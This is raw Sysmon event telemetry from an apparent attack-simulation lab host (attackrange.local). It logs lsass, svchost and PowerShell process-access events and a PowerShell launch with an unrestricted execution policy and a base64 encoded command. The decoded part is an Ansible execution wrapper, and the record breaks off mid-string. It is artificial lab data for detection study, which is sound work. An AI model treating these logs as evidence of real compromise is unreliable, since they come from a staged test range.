13:54:41.941{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-85A1-5FCF-E300-000000009101}2228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004520Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.941{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-85A1-5FCF-E300-000000009101}2228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004519Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.910{10ACEC4A-85A1-5FCF-E300-000000009101}2228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_k334rt5f.nwt.ps12020-12-08 13:54:41.910 10341000x80000000000000004518Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.894{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-85A1-5FCF-E300-000000009101}2228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004517Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.879{10ACEC4A-85A1-5FCF-E000-000000009101}33242792C:\Windows\system32\conhost.exe{10ACEC4A-85A1-5FCF-E300-000000009101}2228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004516Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.863{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004515Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.863{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004514Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.863{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004513Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.863{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004512Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.863{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004511Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.863{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004510Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.863{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004509Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.863{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004508Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.863{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004507Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.863{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85A1-5FCF-E300-000000009101}2228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004506Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.863{10ACEC4A-85A1-5FCF-E200-000000009101}4748812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-85A1-5FCF-E300-000000009101}2228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1b25bbb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+fc67c5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+fc6496|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1a77d7b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+f8702c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+fe54fb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+fc8b60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+fc8b60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+fc89f1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+fba976|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+fc6ea9|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+fc6a9c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+fc67c5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+fc6496|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+1a77d7b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+fad2f7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+fac8c7 154100x80000000000000004505Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.877{10ACEC4A-85A1-5FCF-E300-000000009101}2228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-85A1-5FCF-2492-080000000000}0x892240HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-85A1-5FCF-E200-000000009101}4748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHA